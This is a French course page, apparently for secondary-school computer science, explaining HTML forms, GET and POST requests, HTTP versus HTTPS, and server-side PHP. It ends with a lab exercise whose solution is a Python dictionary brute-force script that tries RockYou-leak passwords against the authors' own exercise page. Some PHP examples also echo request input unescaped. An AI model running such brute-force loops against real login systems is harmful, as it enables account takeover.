---
author: Pierre Marquestaut, Gilles Lassus
title:  Requêtes GET, POST et formulaires
---

# Requêtes GET, POST et formulaires

## 1. Formulaires

Les formulaires HTML permettent aux utilisateurs de saisir des données et de les envoyer au serveur. Ils sont très courants sur les sites web, par exemple pour s'inscrire, se connecter, ou soumettre des commentaires.

Pour créer un formulaire, on utilise la balise `form`. Cette balise contient différents éléments qui permettent de collecter des informations, appelés "éléments de formulaire" (ou "inputs").


!!! question "les balises d'un formulaire"
    <iframe id="vocabulaire"
    title="Vocabulaire sur les langages"
    width="100%"
    height="600"
    src="{{ page.canonical_url }}../activites/formulaire.html">

## 2. Côté client : comment envoyer des paramètres à un serveur ?

### 2.1. La méthode GET

Considérons le formulaire suivant, inclus dans une page html ouverte dans le navigateur du client :

```html 
Le mot de passe est :
<form action="cible2.php" method="get">
<p>
    <input type="password" name="pass" /> 
    <input type="submit" value="Valider" />
</p>
</form>
```

**Aperçu :**

![](images/pass1.png){: .center}


**Explications :**

- le fichier ```cible2.php``` est le fichier sur le serveur qui recevra les paramètres contenus dans le formulaire.
- le paramètre sera nommé ```pass``` et sera de type ```password```, ce qui signifie qu'on n'affichera pas les caractères tapés par l'utilisateur.
On aurait pu aussi avoir un type :
    - ```text``` : le texte s'affiche en clair (pour les login par ex) 
    - ```radio``` : pour une sélection (d'un seul élément)
    - ```checkbox``` : pour une sélection (éventuellement multiple)
- un bouton comportant le label «Valider» déclenchera l'envoi (grâce au type particulier ```submit```) des paramètres (ici un seul, la variable ```pass```) au serveur.

#### Test :
1. Rendez-vous sur la page [http://glassus1.free.fr/ex_get.html](http://glassus1.free.fr/ex_get.html){:target="_blank"} et testez un mot de passe.
2. Observez attentivement l'url de la page sur laquelle vous êtes arrivés. Que remarquez-vous ?


#### La méthode GET et la confidentialité :
Les paramètres passés au serveur par la méthode GET sont transmis **dans l'url de la requête**. Ils sont donc lisibles **en clair** par n'importe qui.

![](images/get1.png){: .center}

Évidemment, c'est une méthode catastrophique pour la transmission des mots de passe. Par contre, c'est une méthode efficace pour accéder directement à une page particulière : ainsi l'url [https://www.google.fr/search?q=bordeaux](https://www.google.fr/search?q=bordeaux){:target="_blank"} nous amènera directement au résultat de la recherche Google sur le mot-clé «bordeaux».


### 2.2. La méthode POST

Dans notre code de formulaire du 1.1, modifions l'attribut ```method```, auparavant égal à ```"get"```. Passons-le égal à ```"post"```  :

```html 
Le mot de passe est :
<form action="cible2.php" method="post">
<p>
    <input type="password" name="pass" /> 
    <input type="submit" value="Valider" />
</p>
</form>
```

#### Test :
1. Rendez-vous sur la page [http://glassus1.free.fr/ex_post.html](http://glassus1.free.fr/ex_post.html){:target="_blank"} et testez un mot de passe.
2. Observez attentivement l'url de la page sur laquelle vous êtes arrivés. Que remarquez-vous ?

#### La méthode POST et la confidentialité :
Les paramètres passés au serveur par la méthode POST **ne sont pas visibles** dans l'url de la requête. Ils sont contenus dans le corps de la requête, mais non affichés sur le navigateur.

![](images/post1.png){: .center}

Donc, la transmission du mot de passe est bien sécurisée par la méthode POST ? 

:warning: Pas du tout ! Si le protocole de transmission est du ```http```  et non pas du ```https```, n'importe qui interceptant le trafic peut lire le contenu de la requête et y trouver le mot de passe en clair.

**Exemple avec [Wireshark](https://www.wireshark.org/)** :

![](images/wireshark.png){: .center}

Le contenu de la variable ```"pass"``` est donc visible dans le contenu de la requête. 

Le passage en ```https``` chiffre le contenu de la requête et empêche donc la simple lecture du mot de passe.





#### Résumé : quand utiliser GET ou POST ?
- **GET** : la méthode GET doit être utilisée quand les paramètres à envoyer :
    - n'ont pas de caractère confidentiel. 
    - n'ont pas vocation à créer des modifications sur le serveur (ceci est plus une bonne pratique qu'une interdiction technique)
    - ne sont pas trop longs. En effet, vu qu'ils seront contenus dans l'url, il peut exister des limites de longueur spécifiques au navigateur. Une taille inférieure à 2000 caractère est conseillée.
    Si vous vous demandez à quoi peuvent servir des url si longues, songez à ce type d'url, (ici PythonTutor) où le code du programme à analyser est **contenu** dans l'url : 
    [http://pythontutor.com/visualize.html#code=L%20%3D%20%5B2,%203,%206,%207,%2011,%2014,%2018,%2019,%2024%5D%0A%0Adef%20trouve_dicho%28L,%20n%29%20%3A%0A%20%20%20%20indice_debut%20%3D%200%0A%20%20%20%20indice_fin%20%3D%20len%28L%29%20-%201%0A%20%20%20%20while%20indice_debut%20%3C%3D%20indice_fin%20%3A%0A%20%20%20%20%20%20%20%20indice_centre%20%3D%20%28indice_debut%20%2B%20indice_fin%29%20//%202%0A%20%20%20%20%20%20%20%20valeur_centrale%20%3D%20L%5Bindice_centre%5D%0A%20%20%20%20%20%20%20%20if%20valeur_centrale%20%3D%3D%20n%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20indice_centre%0A%20%20%20%20%20%20%20%20if%20valeur_centrale%20%3C%20n%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20indice_debut%20%3D%20indice_centre%20%2B%201%0A%20%20%20%20%20%20%20%20else%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20indice_fin%20%3D%20indice_centre%20-%201%0A%20%20%20%20return%20None%0A%0Aprint%28trouve_dicho%28L,14%29%29&cumulative=false&curInstr=0&heapPrimitives=nevernest&mode=display&origin=opt-frontend.js&py=3&rawInputLstJSON=%5B%5D&textReferences=false](http://pythontutor.com/visualize.html#code=L%20%3D%20%5B2,%203,%206,%207,%2011,%2014,%2018,%2019,%2024%5D%0A%0Adef%20trouve_dicho%28L,%20n%29%20%3A%0A%20%20%20%20indice_debut%20%3D%200%0A%20%20%20%20indice_fin%20%3D%20len%28L%29%20-%201%0A%20%20%20%20while%20indice_debut%20%3C%3D%20indice_fin%20%3A%0A%20%20%20%20%20%20%20%20indice_centre%20%3D%20%28indice_debut%20%2B%20indice_fin%29%20//%202%0A%20%20%20%20%20%20%20%20valeur_centrale%20%3D%20L%5Bindice_centre%5D%0A%20%20%20%20%20%20%20%20if%20valeur_centrale%20%3D%3D%20n%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20indice_centre%0A%20%20%20%20%20%20%20%20if%20valeur_centrale%20%3C%20n%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20indice_debut%20%3D%20indice_centre%20%2B%201%0A%20%20%20%20%20%20%20%20else%20%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20indice_fin%20%3D%20indice_centre%20-%201%0A%20%20%20%20return%20None%0A%0Aprint%28trouve_dicho%28L,14%29%29&cumulative=false&curInstr=0&heapPrimitives=nevernest&mode=display&origin=opt-frontend.js&py=3&rawInputLstJSON=%5B%5D&textReferences=false){:target="_blank"}
    <br>
- **POST** : la méthode POST doit être utilisée quand les paramètres à envoyer :
    - ont un caractère confidentiel (attention, à coupler impérativement avec un protocole de chiffrement).
    - peuvent avoir une longueur très importante (le paramètre étant dans le corps de la requête et non plus dans l'url, sa longueur peut être arbitraire).
    - ont vocation à provoquer des changements sur le serveur. Ainsi, un ordre d'achat sur un site de commerce sera nécessairement passé par une méthode POST. Les navigateurs préviennent alors le risque de «double commande» lors d'une actualisation malencontreuse de la page par l'utilisateur par la fenêtre :

    ![](images/alertepost.png){: .center}

    Cette fenêtre est caractéristique de l'utilisation d'une méthode POST.

## 3. Côté serveur : comment récupérer les paramètres envoyés ?

Du côté du serveur, le langage utilisé (PHP, Java...) doit récupérer les paramètres envoyés pour modifier les élements d'une nouvelle page, mettre à jour une base de données, etc. Comment sont récupérées ces valeurs ? 

#### Exemple en PHP

 L'acronyme **PHP** signifie **P**HP : **H**ypertext **P**rocessor (c'est un [acronyme récursif](https://fr.wikipedia.org/wiki/Sigles_auto-r%C3%A9f%C3%A9rentiels){:target="_blank"}).

 Notre exemple va contenir deux fichiers :

 - une page ```page1.html``` , qui contiendra un formulaire et qui renverra, par la méthode GET, un paramètre à la page ```page2.php```.
 - une page ```page2.php``` , qui génèrera un code ```html ``` personnalisé en fonction du paramètre reçu.  

#### ```page1.html``` 

```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>exemple</title>
  </head>
  <body>
 Votre OS actuel est un : 
<form action=page2.php method="get">
<p>
    <input type="radio" name="OS" value="Windows"> Windows </input>
    <input type="radio" name="OS" value="MacOS"> MacOS </input>
    <input type="radio" name="OS" value="GNU/Linux"> GNU/Linux </input>
</p>
<p> 
    <input type="submit" value="Valider" />
</p>
</form>
  </body>
</html>
``` 

#### ```page2.php``` 
```php
 <!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <title>Le meilleur OS</title>
    </head>
    <body>
 <p>
	<?php
  if (isset($_GET['OS']))
  {
	Print("Vous avez raison, ");
  echo $_GET['OS'];
  Print(" est le meilleur des OS.");
  }
	?>
	</p>

</body>
</html>
```

#### Détail du fonctionnement :
 1. À l'arrivée sur la page ```page1.html```, un formulaire de type boutons radio lui propose :
 ![](images/exphp1.png){: .center}
 2. Lorsque l'utilisateur clique sur «Valider», la variable nommée ```OS``` va recevoir la valeur choisie et va être transmise par une requête GET à l'url donnée par la variable ```action``` définie en début de formulaire.
 Ici, le navigateur va donc demander à accéder à la page ```page2.php?OS=MacOS``` (par exemple)
 3. Le serveur PHP qui héberge la page ```page2.php``` va recevoir la demande d'accès à la page ainsi que la valeur de la variable ```OS```.
 Dans le code PHP, on reconnait :
     - le booléen ```isset($_GET['OS'])```  qui vérifie si le paramètre ```OS``` a bien reçu une valeur.
     - l'expression ```$_GET['OS']``` qui récupère cette valeur. 
     Si la valeur avait été transmise par méthode POST (pour un mot de passe, par exemple), la variable aurait été récupérée par ```$_POST['OS']```. Elle n'aurait par contre pas été affichée dans l'url de la page.
4. La page ```page2.php?OS=MacOS``` s'affiche sur le navigateur de l'utilisateur :

![](images/exphp2.png){: .center}

#### Remarque
L'exemple ci-dessus est un mauvais exemple : rien ne justifie l'emploi d'un serveur distant. L'affichage de ce message aurait très bien pu se faire en local sur le navigateur du client, en Javascript par exemple.

L'envoi de paramètres à un serveur distant est nécessaire pour aller interroger une base de données, par exemple (lorsque vous remplissez un formulaire sur le site de la SNCF, les bases de données des horaires de trains, des places disponibles et de leurs tarifs ne sont pas hébergées sur votre ordinateur en local...).

La vérification d'un mot de passe doit aussi se faire sur un serveur distant.


!!! example "A vous de jouer"
    Créez une page ```page2```  dont l'apparence est conditionné à un mot de passe rentré en ```page1```.

    La page ```page1.html``` contiendra un formulaire comme :

    ```html
    <form action="page2.php" method="get">
    <p>
        <input type="password" name="mdp" />
        <input type="submit" value="Valider" />
    </p>
    </form>
    ```  
    
     La page ```page2.php``` contiendra un code PHP comme :

    ```php
    <?php
    if (isset($_GET['mdp']) AND ($_GET['mdp']=='votremotdepasse'))
    {echo "Good job.";
    echo '<br>';
    echo '<img src="https://media.giphy.com/media/u4CY9BW4umAfu/giphy.gif">';
    }
    else {
    echo 'raté';}
    ?>
    ```   

    Dans le code PHP, on peut insérer le code ```html``` qui sera fabriqué avec la commande ```echo```. 


!!! example "attaque par force brute et requête GET"
    


    ![image](images/hackerman.png){: .center width=50%}


    #### Pré-requis 1 : le module ```requests``` en python

    Le module ```requests``` permet d'aller chercher le contenu d'une page web, suivant la syntaxe ci-dessous.
    Testez le code ci-dessous :

    ```python linenums='1'
    import requests
    p = requests.get("http://glassus1.free.fr/interesting.html", verify = False)
    print(p.text)
    ```

    La sortie en console est :

    ```
    <!DOCTYPE html>
    <html>

    <head>

    <title>Waouh</title>
    </head>

    <body>
    Ceci est vraiment une jolie page web.
    </body>

    </html>
    ``` 

    Notre programme Python se comporte donc «comme un navigateur» : il se rend sur une page, effectue une requête et récupère la page renvoyée.


    #### Pré-requis 2 : l'extraction d'un fichier texte sous forme de liste

    Le code ci-dessous permet de collecter dans une liste ```mots``` l'ensemble des mots compris dans le fichier ```monfichiertexte.txt``` (si celui-ci comprend un mot par ligne) 

    ```python
    mots = open("monfichiertexte.txt").read().splitlines()
    ```

    #### Exercice :
    Votre objectif est de trouver le mot de passe demandé sur la page [http://glassus1.free.fr/exoBF.html](http://glassus1.free.fr/exoBF.html){:target="_blank"}

    Vous allez vous appuyer sur un leak (*fuite*) très célèbre de mots de passe , qui est le leak du site Rockyou. Dans la base de données de ce site, 32 millions de mots de passe étaient stockés en clair ```¯\_(ツ)_/¯```.

    Lorsque le site a été piraté (par une injection SQL, voir le cours de Terminale), ces 32 millions de mots de passe se sont retrouvés dans la nature. Ils sont aujourd'hui téléchargeables librement, et constituent un dictionnaire de 14 341 564 mots de passe différents (car parmi les 32 millions d'utilisateurs, beaucoup utilisaient des mots de passe identiques).
    Ce fichier est téléchargeable [ici](https://www.kaggle.com/wjburns/common-password-list-rockyoutxt){:target="_blank"}, mais attention il pèse 134 Mo.

    Nous allons utiliser un fichier beaucoup plus léger ne contenant que les 1000 premiers mots de passe : vous le trouverez à l'adresse [http://glassus1.free.fr/extraitrockyou.txt](http://glassus1.free.fr/extraitrockyou.txt){:target="_blank"} .

    L'un de ces mots de passe est le mot de passe demandé à la page  [http://glassus1.free.fr/exoBF.html](http://glassus1.free.fr/exoBF.html){:target="_blank"} .

    Lequel ?


    ??? success "Correction" 
        ```python linenums='1'
        import requests

        page_error = requests.get('http://glassus1.free.fr/repBF.php?pass=')

        liste_mdp = open('extraitrockyou.txt').read().splitlines()

        url = 'http://glassus1.free.fr/repBF.php?pass='

        for mdp in liste_mdp:
            new_url = url + mdp
            print(new_url)
            page_tentative = requests.get(new_url)
            if page_tentative.text != page_error.text:
                print('Le mot de passe est le suivant :', mdp)
                break
        ```        
    """





